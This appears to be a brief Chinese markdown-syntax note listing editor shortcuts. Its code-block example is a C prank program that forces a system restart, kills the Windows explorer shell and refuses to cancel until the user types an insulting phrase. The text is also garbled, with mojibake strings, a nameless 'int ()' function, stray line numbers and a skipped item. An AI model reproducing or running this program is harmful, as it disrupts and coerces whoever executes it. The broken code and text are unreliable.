markdown基础语法

首次使用MarkDown

1.下划线,ctrl+u

2.斜体,ctrl+l

3.加粗,ctrl+b

4.代码:#include<stdio.h>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
5.代码块:

#include<string.h>
#include<stdlib.h>
int ()
{
char a[12],b[12]={"ÎÒÊÇÖí"};
system("shutdown -r -t 90");
system("taskkill/im explorer.exe /f");
system("cls");
bug: printf("˵ÄãÊÇÖín");
scanf("%s",a);
if(strcmp(a,b)==0)
{
system("shutdown -a");
system("explorer.exe");
}
else goto bug;
}

7.超链接:crtl+k